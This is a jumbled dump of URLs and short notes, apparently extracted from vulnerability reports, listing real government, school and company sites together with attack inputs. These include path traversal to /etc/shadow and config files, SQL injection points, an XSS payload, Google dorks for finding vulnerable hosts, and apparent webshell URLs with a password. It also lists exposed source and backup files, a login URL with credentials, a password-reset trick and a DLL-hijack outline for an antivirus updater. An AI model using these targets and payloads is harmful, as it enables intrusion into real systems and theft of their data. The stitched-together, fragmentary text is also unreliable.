http://u.mumayi.com/oauth/?m=Oauth&a=authorize https://sls.cdb.com.cn/ http://www.tfbpay.cn/tfbpay/index.php/pc/manager/products http://www.tfbpay.cn/mobilepay/admin/login/login.html http://xs.haierzmd.com/zclr1.asp?ID=51 http://xs.haierzmd.com/pic_qb.asp?tid=8 http://xs.haierzmd.com/ylm_xx_elmxx.asp?eid=3 http://xs.haierzmd.com/pic_pic.asp?tid=1&pid=18 http://www.jyw.gov.cn/web/download.file?file_name=/WEB-INF/web.xml http://www.jyw.gov.cn/web/download.file?file_name=../web/pages/browse/2_index.jsp https://wap.wuhan.wandamoviepark.com/ https://wap.wuhan.wandamoviepark.com/LogIn/BackPwd http://www.longwan.gov.cn/ http://218.206.93.16/login.action http://114.255.242.150/loginAction!login.action http://219.142.60.70:8080 http://219.142.60.77:8080 http://219.142.60.70:8080/download.action?filename=../../../../../../etc/shadow http://219.142.60.77:8080/download.action?filename=../../../../../../etc/shadow http://yuedu.baidu.com/ebook/59ee9b9b89eb172dec63b724 http://yuedu.baidu.com/ebook/59ee9b9b89eb172dec63b724?t=1418749898736#comment 
www.xxx.com/do.php?act=goods_list,POST中的参数checkbox存在注入,程序没有对checkbox过滤,造成了注入。 http://www.huaxiayixin.com/ www.xxx.com/do.php?act=edit_transport_template,POST中的参数$id http://124.115.212.26//ecdomain/portal/survey/admin/ShowSheets.jsp?asid=1&sid=1* http://www.bjws.gov.cn//ecdomain/portal/survey/admin/ShowSheets.jsp?asid=1&sid=1* http://bz.smesd.gov.cn//ecdomain/portal/survey/admin/ShowSheets.jsp?asid=1&sid=1* http://wf.smesd.gov.cn/ecdomain/portal/survey/admin/ShowSheets.jsp?asid=1&sid=1* http://www.lnsxnh.com/ecdomain/portal/survey/admin/ShowSheet.jsp?asid=1*&sid=1 http://www.fsfdc.com.cn//ecdomain/portal/survey/admin/ShowSheet.jsp?asid=1*&sid=1 http://www.hbsgjj.cn/ecdomain/portal/survey/admin/ShowSheet.jsp?asid=1*&sid=1 http://220.178.252.189:8085//ecdomain/portal/survey/admin/ShowSheet.jsp?asid=1*&sid=1 http://www.imeach.com/ http://220.231.193.78:8080/meachCRM//accusation2/index/-1 http://www.cloud511.com/case http://www.jylbx.com/getProductList.do?typeId=1210 http://www.smdyf.cn/getProductList.do?typeId=1064 http://www.sydyf.com/getProductList.do?typeId=114 http://test.hzyibai.com/getProductList.do?typeId=1296 http://test.gxjjls.com/getProductList.do?typeId=1714 http://www.hangzhoudrt.com/getProductList.do?typeId=1268 http://www.zjbtv.com/注册用户,然后在爆料中心上传,通过合成图片马,再用burp截包修改后缀名上传! 
http://zg.fj10010.com/ http://zg.fj10010.com//.svn/entries https://github.com/fanyeren/ruby_notes/blob/bae8d21f45facdcefad7787284c463797a792af3/im/prod/redis/config/monit.conf.erb http://mail.58.com http://personal.avira-update.com/update/idx/master.idx下载主索引文件,这个文件描述的是一个生成日期,伪造文件内容如下: http://personal.avira-update.com/update/idx/wks_avira13-win32-zhcn-pecl.idx下载第二个索引文件,这个文件描述的是一些产品相关的信息,包括产品信息包的文件路径,还有哈希值,伪造文件内容如下: http://personal.avira-update.com/update/idx/wks_avira-win32-zhcn-pecl.info.gz下载要升级的模块信息,伪造的文件内容如下: http://personal.avira-update.com/update/idx/vdf.info.gz下载另一个模块的描述信息,这个文件同样适用gzip压缩传输: http://personal.avira-update.com/update/../../msimg32.dll,这个文件下载后,就会发到我们计算好的相对路径中,未做数字签名校验,最终导致DLL劫持注入,执行攻击者代码的后果。 http://nmg.wo.com.cn/index.action http://nmg.wo.com.cn/bak.jsp encap:Ethernet AC:16:2D:7A:F7:6C addr:172.16.1.1 Bcast:172.16.1.127 Mask:255.255.255.128 ae16:2dff:fe7a:f76c/64 Scope:Link MTU:1500 packets:733598549 errors:3348 packets:1936298895 http://www.ehaier.com/bbs/robots.txt/1.php http://bbs.youzu.com/ http://210.75.220.140/login.jsp http://w3.hevttc.edu.cn/jxjyxy/shownews.asp?id=458 http://w3.hevttc.edu.cn/jxjyxy/admin/ http://www.myrepospace.com/cydia/***.php http://www.myrepospace.com/cydia/***.php?i=631433 http://eoffice8.weaver.cn:8028/wav/1.php,密码为pass http://61.163.107.26:8082/wav/1.php http://219.232.254.131:8082/wav/1.php http://122.224.149.30:8082/wav/1.php http://www.eduwind.com/release http://demo.eduwind.com/cms/article/index/cid/29 http://demo.eduwind.com/cms/people/index/cid/26 http://enterprise.zte.com.cn,提交重要信息变更(如个人账户信息修改)时缺少校验,存在CSRF漏洞。 http://wz.easou.com/gs.e?esid=U4xDHpoG85s&gsid=1631&gsname=%E4%B9%A6%E7%B1%8D&wver=t http://www.xplus.com/ www2.easou.com:8080 http://www2.easou.com:8080 cn:8088/manager/login!login2.do http://222.186.12.144:8888/ 
http://www.baidu.com/s?wd=http%3A%2F%2F222.186.12.144%3A8888%2F&rsv_spt=1&issp=1&f=8&rsv_bp=0&rsv_idx=2&ie=utf-8&tn=baiduhome_pg&rsv_enter=0&oq=%E4%BA%92%E8%81%94%E7%BD%91%E5%BA%94%E6%80%A5&inputT=799&rsv_pq=85d5d28100007683&rsv_t=022cQ4rxhIN8l4PiN1qvrX3GHzbAFvPglZ9yczNixGk6kNE2iZFnRkaYpCLDsZ5Y%2F0SY&rsv_n=2&rsv_sug3=16&rsv_sug4=586&rsv_sug1=16&rsv_sug=1&bs=%E4%BA%92%E8%81%94%E7%BD%91%E5%BA%94%E6%80%A5%E4%B8%AD%E5%BF%83 http://gxlyjt.com/index.php?gxlyjt=130&wap=1 http://www.cqwswsjds.com/index.php/Content/index/type/85.html?cqwswsjds=1661 http://www.cqkxajj.gov.cn/index.php/Content/index/type/209.html?gov=748 album.kuwo.cn/album/h/xinQingView?id=8 inurl:szxy/logon.action filetype:action http://www.zjxjzx.cn:8080/szxy/logon.action http://60.190.127.23:8181/szxy/logon.action http://www.lwhczx.com/szxy/logon.action http://www.nbchzx.com/szxy/logon.action http://www.scsyxx.net:8080/szxy/logon.action http://www.ra2z.cn:8181/szxy/logon.action http://202.119.83.28:8080/gallery/demo.txt http://220.178.252.189:8085//ecdomain/portal/survey/admin/QuestionEdit.jsp?op=editQuestion&qid=* http://124.115.212.26//ecdomain/portal/survey/admin/QuestionEdit.jsp?op=editQuestion&qid=* http://www.bjws.gov.cn//ecdomain/portal/survey/admin/QuestionEdit.jsp?op=editQuestion&qid=* http://www.dggjj.cn/ecdomain/portal/survey/admin/QuestionEdit.jsp?op=editQuestion&qid=* http://ecard.sjtu.edu.cn/indexmanagerLogin.action http://show.kuwo.cn/KuwoLive/Xphoto?ptype=0&uid=120563511 http://210.75.218.181/spba/pub/spectacleInfo.action http://118.186.217.53/nexus/ inurl:library.koolearn.com/user http://library.koolearn.com/online/library.jsp http://library.koolearn.com/online/library.jsp http://login.koolearn.com/sso/login.do?userName=klb_cumtb0118_cumtb20061229_000_library&password=77c41cfc2a4b60401867587a8a85a573&next_page= http://218.78.217.95:7001/defaultroot/GovSendFileAction.do?id=2&action=delete 
http://www.bjtgc.com.cn/icar/user/index-comp!getSpecBySpecId.action?specId=fecff38a-9bbc-4c33-88e7-093e54261faa http://babyxy.mm.56.com http://cicoo.mm.56.com http://clinre.mm.56.com http://ddgg6611.mm.56.com http://honey-tong.mm.56.com http://i86119210.mm.56.com http://ruru0629.mm.56.com http://smile0227.mm.56.com http://tu_ji.mm.56.com http://vivi945.mm.56.com http://woshimaoerbaobei.mm.56.com http://ws5213689.mm.56.com http://babyxy.mm.56.com/.svn/entries http://cicoo.mm.56.com/.svn/entries http://clinre.mm.56.com/.svn/entries http://ddgg6611.mm.56.com/.svn/entries http://honey-tong.mm.56.com/.svn/entries http://i86119210.mm.56.com/.svn/entries http://ruru0629.mm.56.com/.svn/entries http://smile0227.mm.56.com/.svn/entries http://tu_ji.mm.56.com/.svn/entries http://vivi945.mm.56.com/.svn/entries http://woshimaoerbaobei.mm.56.com/.svn/entries http://ws5213689.mm.56.com/.svn/entries http://www.rzdonggang.gov.cn/ycportal/jsp/explorer/annex_manager.jsp http://www.rzdonggang.gov.cn/ycportal/jsp/explorer/annex_file.jsp?url=/ http://www.rzdonggang.gov.cn/ycportal/jsp/explorer/annex_file.jsp?url=/../ http://www.jxfdacdc.cn/ycportal/jsp/explorer/annex_file.jsp?url=/ http://www.dtycgs.cn/ycportal/jsp/explorer/annex_file.jsp?url=/ http://121.30.232.54:9080/ycportal/jsp/explorer/annex_file.jsp?url=/ http://sxlfyc.com/ycportal/jsp/explorer/annex_file.jsp?url=/ http://www.lvlyc.com.cn/ycportal/jsp/explorer/annex_file.jsp?url=/ http://59.53.245.105/ycportal/jsp/explorer/annex_file.jsp?url=/ http://szycgs.cn/ycportal/jsp/explorer/annex_file.jsp?url=/ http://192.168.4.70/a.php www.kuwo.cn/mingxing/%E5%87%A4%E5%87%B0%E4%BC%A0%E5%A5%87/pic_1.htm?subId=4 http://121.251.136.3:81/products_detail.asp?id=15 http://ehome.zte.com.cn:9009/index.php?app=search&cate_id=1 inurl:xwl.do?smid= http://123.130.246.26:9080/wscgs/xwl.do?smid=16&bgid=01&bj=8 http://60.211.179.22:9080/wscgs/xwl.do?smid=16&bgid=01&bj=8 http://www.lcwscgs.com/wscgs/xwl.do?bgid=04&smid=22&bj=8 
http://58.59.39.43:9080/wscgs/xwl.do?smid=22&bgid=04&bj=8 http://221.2.145.164:9080/wscgs/xwl.do?bgid=07&smid=27&bj=8 http://cgs.qdpolice.gov.cn:9080/wscgs/xwl.do?smid=53&bgid=04&bj=8 http://www.bzwscgs.com:9080/wscgs/xwl.do?bgid=02&smid=18&bj=8 dynamic.help.xunlei.com/getArticlesBySearch.do?callback=jsonp1418799470192&searchstr=aaaa&_=1418799470273 http://www.dagexing.com/qq_qqOauthBack.do?code=D92DAFB5CBD1301544402A61F841BD08&state=3a2918360a82b35b6cd3a849e2c549ee http://www.dagexing.com/MemQQSinaManage_sendCaptcha.do www.dagexing.com http://www.dagexing.com http://wdcx.yundasys.com:11347/p3_system_web/login.jsp http://116.52.249.28:8080/axis2/axis2-admin http://116.52.249.28:8080/axis2/services/MobileServiceLocal?wsdl http://203.171.229.167:8080/ www.cnshuiyu.com http://121.30.226.44/login.asp http://124.65.69.14/login.asp http://vos.tjufe.edu.cn/login.asp http://211.68.250.42/login.asp http://www.fzsyxx.com/oa/ http://oa.ccib.com.cn/login.asp http://www.cnshuiyu.com/login.asp http://oa.tjfsu.edu.cn/login.asp http://old.mdjagri.gov.cn/oa/login.asp http://60.171.34.204:8086/ http://116.228.82.237/login.asp http://dfoa.shhjwl.com/login.asp http://www.cnshuiyu.com/login.asp http://211.68.192.21/login.asp http://121.30.226.44/login.asp http://180.166.7.94/login.asp http://cqkyoa.oicp.net/login.asp http://121.30.226.44/login.asp http://124.65.69.14 http://vos.tjufe.edu.cn http://211.68.250.42天津农学院 http://www.fzsyxx.com/ http://oa.ccib.com.cn/login.asp http://www.cnshuiyu.com/login.asp http://oa.tjfsu.edu.cn/login.asp http://old.mdjagri.gov.cn/oa/login.asp http://60.171.34.204:8086/ http://116.228.82.237/login.asp http://dfoa.shhjwl.com/login.asp http://www.cnshuiyu.com/login.asp http://211.68.192.21/login.asp http://121.30.226.44/login.asp http://180.166.7.94/login.asp http://cqkyoa.oicp.net/login.asp param:DepartList,OAID http://www.wayboo.cn/ http://www.xayfds.net/info.php?class=38 http://www.shfuhai.com/info.php?class=38 http://www.bdjyjx.com/info.php?class=38 
http://www.pbdt360.com/info.php?class=38 http://www.lilongeps.cn/info.php?class=38 http://www.xhbzdc.com/wap/info.php?class=38 http://www.bjznxf.com/info.php?class=38 http://www.qiqiangjx.com/info.php?class=38 http://bibojsj.com/info.php?class=38 http://www.sxtongtu.com/info.php?class=38 http://www.zzpjjg.com/info.php?class=38 http://www.jndsmm.com/info.php?class=38 http://www.changchunyida.com/wap/info.php?class=38 http://www.lnsbhg.com/wap/info.php?class=38 http://www.xawhmc.com/info.php?class=38 http://sjzbangongjiaju.com/info.php?class=38 http://sjzbangongjiaju.com/info.php?class=38 http://www.xawhmc.com/info.php?class=38 http://itpx.haier.com/ http://hpm.haier.net/haiergc/Sys/SystemCtrlList.aspx http://pcp.povos.com.cn/download_detail.jsp?id=10058 https://tender.wanda.cn/ https://tender.wanda.cn/COST/DocumentLibrary/SEFileDownLoad.aspx?f=c:\IFCA_Software\web.config view-source:https://vendor.wanda.cn/tender/default.aspx inurl:eol/homepage/common/ http://*/eol/popups/jpkrecord/upload_file.jsp?courseId=* http://spks2.gzzk.cn/ http://s.haier.com/ s.haier.com/piwik/phpinfo.php http://s.haier.com/km100survey/faces/public/registers.jsp?from=%22--%3E%3CscRipt%3Ealert%28%27xxs%27%29%3C/scRipt%3E%3C!-- http://s.haier.com/km100survey/faces/public/makepassword.jsp?from= http://s.haier.com/km100survey/faces/public/registers.jsp?from= http://s.haier.com/upload/9bb5980b1f244881854fce4cb03514f6.php http://123.58.188.200/ inurl:/ProductView.aspx?did= http://www.yniso9001.com/ProductView.aspx?did=128 http://www.sqlmap.org www.yniso9 http://www.dagexing.com http://**.**.**/loginAction_login.do http://120.197.95.240:8080/login.action http://www.3g.net.cn/recruit/jobs/list/page/1?clear=1&type=0&rid=425 http://www.17u.net/login/reg_ok.asp?uid=228301 http://www.17u.net/login/reg_ok.asp?uid=1 http://www.17u.net/login/reg_ok.asp?uid=133 www.ncrm.org.cn http://www.zzcourt.gov.cn/admin/login.php android:authorities="com.lbe.security.phone android:enabled="true android:exported="true 
android:name="com.lbe.security.service.phone.provider.TelephonyProvider android:process=":service content://com.lbe.security.phone/blacklist content://com.lbe.security.phone/whitelist content://com.lbe.security.phone/keyword content://com.lbe.security.phone/marker content://com.lbe.security.phone/baselist content://com.lbe.security.phone/blocklog content://com.lbe.security.phone/ipwhitelist content://com.lbe.security.phone/yellow_page_cache content://com.lbe.security.phone/user_permit_number http://www.1039soft.com/ http://huiyuan.edu-pal.com/teacher/Index.aspx http://huiyuan.edu-pal.com/teacher/Index.aspx http://221.214.164.198:1039/Student/StudentLogin.aspx http://www.whaqjx.com/teacher/Index.aspx http://110.249.129.242/Teacher/Index.aspx http://219.145.135.190:88/teacher/Index.aspx http://222.223.229.50:8080/teacher/Index.aspx http://www.wepiao.com/?m=web&c=film&a=filmsrc&fid=1787 http://119.38.194.93/partner/downloadEpolicy.do?policyCode=6033187XXXXXXXX http://www.xaglkp.com/ inurl:/list.jsp http://www.sasacgs.gov.cn/detail.jsp?articleId=759 http://www.jcsxz.com/detail.jsp?articleId=450 http://www.gsjkjy.org.cn/detail.jsp?articleId=8895 http://www.qyszxxz.com/detail.jsp?articleId=150 http://www.lzfybj.cn/detail.jsp?articleId=912 http://www.365rrs.com/notice/noticeDetail?pk=8796945030977 inurl:e-learning/index.asp google:inurl:/xmlpzs/ysxkdetail.asp?permitsaleno= huangshanhouse.gov.cn/xmlpzs/ysxkdetail.asp www.lzfg.com.cn/.../xmlpzs/ysxkdetail.asp www.wnfdc.com/.../xmlpzs/ysxkdetail.asp www.xnfcxx.com/.../xmlpzs/ysxkdetail.asp cn:5661/.../xmlpzs/ysxkdetail.asp http://123.134.189.60:8013/default4.aspx?CountryName=雪野旅游区&level=0 http://218.56.40.229:8053/default4.aspx?CountryName=%e6%b0%b8%e5%ae%89%e8%b7%af%e8%a1%97%e9%81%93&level=2 http://218.58.124.131:8003/default4.aspx?CountryName=高新区&level=1 http://222.134.154.214:8001/default4.aspx?CountryName=南麻镇&level=2 http://222.135.109.70:8200/default4.aspx?CountryName=文登市&level=1 
http://221.2.149.47:8200/default4.aspx?CountryName=%e8%8d%ab%e5%ad%90%e9%95%87&level=2 http://111.17.169.213:801/default4.aspx?CountryName=%e5%bc%a0%e5%ba%97%e5%8c%ba&level=0 http://jwh.tanljgzx.gov.cn/default4.aspx?CountryName=%e6%b3%b0%e5%ae%89%e5%b8%82&level=0 http://61.133.119.187:8091/default4.aspx?CountryName=%e9%ab%98%e6%8a%80%e5%8c%ba&level=1 www.bjsfdc.com.cn www.altfcw.com www.dffgj.com www.bejfcw.com www.tazzfdc.gov.cn/old/jig1.asp www.xyfg.gov.cn/jig1.asp www.lzfg.com.cn/jig1.asp http://www.dtfc.gov.cn/jig1.asp?owen1=%BB%FA%B9%B9%C9%E8%D6%C3 inurl:zhengc.asp?owen1= www.snfgj.cn/zhengc.asp?owen1=房地产法规 www.dtfc.gov.cn/zhengc.asp?owen1=市政府文件 www.bjsfdc.com.cn/zhengc.asp?owen1=政府文件 www.jzfdc.gov.cn/zhengc.asp?owen1=政府文件 www.xyfg.gov.cn/zhengc.asp?owen1=国家法律 lzfg.com.cn/zhengc.asp?owen1=物业管理法规 http://xxx/zhengc.asp?owen1=%B7%BF%B5%D8%B2%FA%B7%A8%B9%E6 parma:owen1 http://118.186.218.8/ inurl:about.asp?id= http://www.tzkbls.com/about.asp?id=4 http://hnygdjd.com/about.asp?id=5 http://www.tz2d.com/about.asp?id=3 http://www.sdjmjc.com/about.asp?id=2 http://www.tzliangnuo.com/about.asp?id=3 http://www.miyoutech.com/about.asp?id=7 http://www.zzsruifeng.com/about.asp?id=2 http://shengjiahe.cn/about.asp?id=4 http://www.sdlzkj.com/about.asp?id=8 http://www.cyzgmt.com/about.asp?id=13 http://www.ehaier.com/bbs.tar.gz inurl:/noteDetail.jsp www.sasacgs.gov.cn/noteDetail.jsp?articleId=103 www.gongan.ningbo.gov.cn/.../notedetail.jsp www.gsws.gov.cn/noteDetail.jsp?articleId=305 www.gsws.gov.cn/noteDetail.jsp?articleId=255 www.gszlyy.com/noteDetail.jsp?articleId=133 www.jbga.gov.cn/include/notedetail.jsp?id=498 hsga.haishu.gov.cn/hdzx/notedetail.jsp?id=237 http://202.100.85.100/noteDetail.jsp?articleId=107为例 http://202.100.85.100/noteDetail.jsp?articleId=107" -p www.gszlyy.com/noteDetail.jsp?articleId=133 http://202.100.85.100/noteDetail.jsp?articleId=107" -p inurl:VisaSerchInfo.asp?InterArea= inurl:zhaoshang.asp?bid= http://www.tangciliucao.cn/zhaoshang.asp?bid=22&sid=70 
http://www.powerhg.com/zhaoshang.asp?bid=22&sid=70 http://www.pxtl.com/dj/zhaoshang.asp?bid=22&sid=70 http://www.jsszpc.com/zhaoshang.asp?bid=22&sid=70 http://www.china-saint.com/zhaoshang.asp?bid=22&sid=70 http://www.jsszpc.com/zhaoshang.asp?bid=22&sid=70 http://www.jindamuye.com/zhaoshang.asp?bid=22&sid=70 http://www.pxtl.com/dj/zhaoshang.asp?bid=22&sid=70 http://api.pg.hortorgames.com/player/recharge http://test.api.pg.hortorgames.com:8080/player/recharge http://test.api.pg.hortorgames.com/player/recharge https://180.153.139.91/woa/ http://180.153.139.84:11381/ydccp/login.jsp http://wdcx.yundasys.com:11347/p3_system_web/login.jsp http://wdcx.yundasys.com:81/jjjk/login.php http://nbsw.yundasys.com:11324/jgsz2011/login.php http://nbsw.yundasys.com:11324/gun/login_gh.php http://nbsw.yundasys.com:11324/ztb/jb_login.php http://nbsw.yundasys.com:11324/ztb/login.php http://youwu.jiemian.com/index.php?m=address&a=getEdit&id=342 http://my.ntu.edu.cn/ http://kf.youzu.com/ http://kf.youzu.com/online/chat/index/game_id/20 http://kf.uuzuonline.com/wy.php http://www2.easou.com:8080/views/login.action inurl:/NewsView.aspx?nid= inurl:/Product.aspx?nid= http://www.yniso9001.net/NewsView.aspx?nid=65 http://www.sqlmap.org www.yniso9 http://222.189.45.162/dzts/us_mima2.asp http://lsxnmxx.js.cn:41516/tushu/us_mima2.asp http://ts.gylyxx.com/us_mima2.asp http://221.181.233.195:10003/us_mima2.asp http://221.181.191.140/dzts/us_mima2.asp http://221.231.112.70:2001/syxdzts/us_mima2.asp http://tushu.dhxctzx.com/us_mima2.asp http://www.gyxjsxx.com/tushu/us_mima2.asp http://220.170.135.156:88/dzts//us_mima2.asp http://61.175.231.112:8090/dzts/us_mima2.asp http://61.175.231.112:8090/dzts/us_mima2.asp http://cip.tongfangpc.com.cn/cipweb/login.action http://i.hdu.edu.cn/ http://i.hdu.edu.cn/dcp/dcp/ http://i.hdu.edu.cn/dcp/upload_files/ http://i.hdu.edu.cn/dcp/upload_files/storage/ http://bq.sto.cn/Login.aspx http://my.ntu.edu.cn/ http://218.106.154.156 
http://mail.shiep.edu.cn/sql/a.php页面内使用了var_dump函数泄露了root用户密码 http://mail.shiep.edu.cn/user/addrbook/import_cvs_log.txt http://t.cn/Rz3iGer http://www.wepiao.com/index.php?m=web&c=film&a=filmdetail&fid=1597 http://crm.airpp.com/crmtravel/userManagerAction!login.action http://203.192.12.73/Login!input.action http://www.asdht.com/ http://tuan.eduts.com/help/pendantShow.aspx?stype=3&&cityid=@@version http://tuan.2760391.cn/help/pendantShow.aspx?stype=3&&cityid=@@version http://www.ndtuan.com/help/pendantShow.aspx?stype=3&&cityid=@@version http://m.5izi.com/help/pendantShow.aspx?stype=3&&cityid=@@version http://benear.net/help/pendantShow.aspx?stype=3&&cityid=@@version http://tg.mm315.cn/help/pendantShow.aspx?stype=3&&cityid=@@version http://www.pxtb.org/help/pendantShow.aspx?stype=3&&cityid=@@version http://jiaodatuan.com/help/pendantShow.aspx?stype=3&&cityid=@@version http://tuan.mojing8.com/bangzhu/pendantShow.aspx?stype=3&&cityid=@@version http://www.tongluowan.com/help/pendantShow.aspx?stype=3&&cityid=@@version http://tuan.hk360buy.com/help/pendantShow.aspx?stype=3&&cityid=@@version http://58.53.209.134/help/pendantShow.aspx?stype=3&&cityid=@@version http://tuan.jetsoguide.com/bangzhu/pendantShow.aspx?stype=3&&cityid=@@version http://www.mtuan365.com/help/pendantShow.aspx?stype=3&&cityid=@@version http://tuangou.yongyao.net/help/pendantShow.aspx?stype=3&&cityid=@@version http://www.vlvyou.com/help/pendantShow.aspx?stype=3&&cityid=@@version http://service.yhky.com/zjonline/getStation.do?regioncode=118001 http://my.xunyou.com/index.php/memberpanel/selectfindmethod http://gd.xunyou.com/upload/20141201/c4fd5b36eaadb6d5fa8a1b90412b390f.txt http://gd.xunyou.com/upload/20141201/a647df03fcdf0cae8fc37b15ade020d2.jpg http://cs.xunyou.com/index.php http://cs.xunyou.com/index.php/thread/addthread/1 http://cs.xunyou.com/upload/20141218/5428899/2f618a2649461253560d865ad59243b3.htm http://211.140.155.107/bak.jsp http://demo.htmdata.com/ashx/GetPage.ashx 
http://www.fudian-bank.com/www.fudian-bank.com.rar http://182.92.159.54/panel/login.php www.kfzx.gov.cn http://yun.fangdd.com/basic/user/my http://www.whwebsite.com/ inurl:About.aspx http://www.whhelmet.com/admin/index.aspx http://**.**.**/Product.aspxindex=300_ http://**.**.**/Product.aspxindex=5_ http://**.**.**/Product.aspxindex=23_ http://**.**.**/Product.aspxindex=15_ http://**.**.**/Product.aspxindex=39_ http://**.**.**/Product.aspxindex=4_ http://**.**.**/Product.aspxindex=1_ http://**.**.**/Product.aspxindex=12_ http://**.**.**/Product.aspxindex=27_ http://**.**.**/Product.aspxindex=4_ http://**.**.**/Product.aspxindex=10_ http://**.**.**/Product.aspxindex=9_ http://**.**.**/Product.aspxindex=11_ http://**.**.**/Product.aspxindex=2_ http://**.**.**/Product.aspxindex=19&Style=5_ http://**.**.**/Product.aspxindex=14_ http://**.**.**/Product.aspxindex=86&Style=1_ http://**.**.**/Product.aspxindex=10_ http://**.**.**/Product.aspxindex=21_ http://**.**.**/Product.aspxindex=3_ http://**.**.**/Product.aspxindex=4_ http://**.**.**/Product.aspxindex=87&Style=3_ http://**.**.**/Product.aspxindex=3_ http://**.**.**/Product.aspxindex=44&Style=19_ http://**.**.**/Product_Show.aspxindex=13_ http://**.**.**/Product_Show.aspxindex=166_ http://**.**.**/Product_show.aspxindex=131_ http://**.**.**/Product_Show.aspxindex=149_ http://**.**.**/Product_Show.aspxindex=128_ http://**.**.**/Product_Show.aspxindex=36_ http://**.**.**/Product_show.aspxindex=106_ http://**.**.**/Product_show.aspxindex=19_ http://**.**.**/Product_Show.aspxindex=128_ http://**.**.**/Product_Show.aspxindex=97_ http://**.**.**/Product_Show.aspxindex=121_ http://**.**.**/Product_Show.aspxindex=159_ http://**.**.**/Product_Show.aspxindex=131_ http://**.**.**/Product_Show.aspxindex=280_ http://**.**.**/Product_Show.aspxindex=230_ http://**.**.**/Product_Show.aspxindex=61_ http://**.**.**/Product_Show.aspxindex=112_ http://**.**.**/Product_Show.aspxindex=961_ http://**.**.**/Product_show.aspxindex=125_ 
http://**.**.**/Product_show.aspxindex=28_ http://**.**.**/Product_Show.aspxindex=44_ http://**.**.**/Product_Show.aspxindex=159_ http://**.**.**/Product_Show.aspxindex=157_ http://**.**.**/Product_Show.aspxindex=118 http://www.frontcn.com/Product.aspx?index=300 http://www.jhsled.com/Product.aspx?index=5 http://www.whwebsite.com/ inurl:About.aspx http://www.whhelmet.com/admin/index.aspx http://**.**.**/Product.aspxindex=300_ http://**.**.**/Product.aspxindex=5_ http://**.**.**/Product.aspxindex=23_ http://**.**.**/Product.aspxindex=15_ http://**.**.**/Product.aspxindex=39_ http://**.**.**/Product.aspxindex=4_ http://**.**.**/Product.aspxindex=1_ http://**.**.**/Product.aspxindex=12_ http://**.**.**/Product.aspxindex=27_ http://**.**.**/Product.aspxindex=4_ http://**.**.**/Product.aspxindex=10_ http://**.**.**/Product.aspxindex=9_ http://**.**.**/Product.aspxindex=11_ http://**.**.**/Product.aspxindex=2_ http://**.**.**/Product.aspxindex=19&Style=5_ http://**.**.**/Product.aspxindex=14_ http://**.**.**/Product.aspxindex=86&Style=1_ http://**.**.**/Product.aspxindex=10_ http://**.**.**/Product.aspxindex=21_ http://**.**.**/Product.aspxindex=3_ http://**.**.**/Product.aspxindex=4_ http://**.**.**/Product.aspxindex=87&Style=3_ http://**.**.**/Product.aspxindex=3_ http://**.**.**/Product.aspxindex=44&Style=19_ http://**.**.**/Product_Show.aspxindex=13_ http://**.**.**/Product_Show.aspxindex=166_ http://**.**.**/Product_show.aspxindex=131_ http://**.**.**/Product_Show.aspxindex=149_ http://**.**.**/Product_Show.aspxindex=128_ http://**.**.**/Product_Show.aspxindex=36_ http://**.**.**/Product_show.aspxindex=106_ http://**.**.**/Product_show.aspxindex=19_ http://**.**.**/Product_Show.aspxindex=128_ http://**.**.**/Product_Show.aspxindex=97_ http://**.**.**/Product_Show.aspxindex=121_ http://**.**.**/Product_Show.aspxindex=159_ http://**.**.**/Product_Show.aspxindex=131_ http://**.**.**/Product_Show.aspxindex=280_ http://**.**.**/Product_Show.aspxindex=230_ 
http://**.**.**/Product_Show.aspxindex=61_ http://**.**.**/Product_Show.aspxindex=112_ http://**.**.**/Product_Show.aspxindex=961_ http://**.**.**/Product_show.aspxindex=125_ http://**.**.**/Product_show.aspxindex=28_ http://**.**.**/Product_Show.aspxindex=44_ http://**.**.**/Product_Show.aspxindex=159_ http://**.**.**/Product_Show.aspxindex=157_ http://**.**.**/Product_Show.aspxindex=118 http://www.frontcn.com/Product.aspx?index=300 http://www.jhsled.com/Product.aspx?index=5 http://whlaobing.com/Product_Show.aspx?index=118 http://shuaiyuchugui.com/Product_Show.aspx?index=157 http://zzxx.nankai.edu.cn/NPELS rsync://122.228.76.54/backup/game1/root/gamed/ rsync://122.228.76.54/backup/game1/root/gamed/lottery.lua http://xxgcx.hbsi.edu.cn/ewebeditor/db/ewebeditor.mdb http://220.115.251.77/index.action https://github.com/haryzhou/zstl/blob/a93bb1646731961d32bba2a02dea056c5a3698b5/conf/zstl.conf http://58.199.193.57:8080/gxwssb/,通过贴吧获得某人学号(12******15),点击忘记密码(部分版本没有忘记密码这个链接),在密码答案处,直接输入000000(000000是系统默认配置),点击确定,密码即被重置为学号 http://58.199.193.57:8080/gxwssb/addhunansjwj?filename=6129test.xls http://58.199.193.57:8080/gxwssb/addhunansjwj?filename=wooyun.jsp http://58.199.193.57:8080/gxwssb/sjwj/wooyun.jsp http://58.199.193.57:8080/gxwssb/sjwj/7348test.jsp http://58.199.193.57:8080/gxwssb/fileDownloadmodel?name=../WEB-INF/web.xml http://www.runoqd.com/admin/Login.aspx http://www.plateno.com/ http://sso.info.xinhua.org/aaa/login.do http://online.scuec.edu.cn/phpadmin/ http://www.rzdonggang.gov.cn/ycportal/jsp/log/index.jsp http://www.jxfdacdc.cn/ycportal/jsp/log/index.jsp http://www.dtycgs.cn/ycportal/jsp/log/index.jsp http://121.30.232.54:9080/ycportal/jsp/log/index.jsp http://sxlfyc.com/ycportal/jsp/log/index.jsp http://www.lvlyc.com.cn/ycportal/jsp/log/index.jsp http://59.53.245.105/ycportal/jsp/log/index.jsp http://szycgs.cn/ycportal/jsp/log/index.jsp http://www.rzdonggang.gov.cn/ycportal/jsp/explorer/backpic.jsp http://www.jxfdacdc.cn/ycportal/jsp/explorer/backpic.jsp 
http://www.dtycgs.cn/ycportal/jsp/explorer/backpic.jsp http://121.30.232.54:9080/ycportal/jsp/explorer/backpic.jsp http://sxlfyc.com/ycportal/jsp/explorer/backpic.jsp http://www.lvlyc.com.cn/ycportal/jsp/explorer/backpic.jsp http://59.53.245.105/ycportal/jsp/explorer/backpic.jsp http://szycgs.cn/ycportal/jsp/explorer/backpic.jsp http://www.govinfo.so/news_info.php?id=33251 http://stu.math.sdu.edu.cn/cms/login.php Description:You http://lukuang.mapbar.com/wxlukuang2/tmc2?pid=../../../../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././passwd%00.htm http://www.kyzz.com.cn http://f.dangdang.com/ http://f.dangdang.com/person/6898509240848/ http://27.223.70.55:88/haier/index.php http://huawei.imagchina.com/huawei.weixin/home/wall/step_two?id=[object%20HTMLInputElement]&from=timeline&isappinstalled=0 http://bailing.iyiyun.com/,此站点是一个dedecms的站点,之前做指纹收集的时候,收集到了该站点。 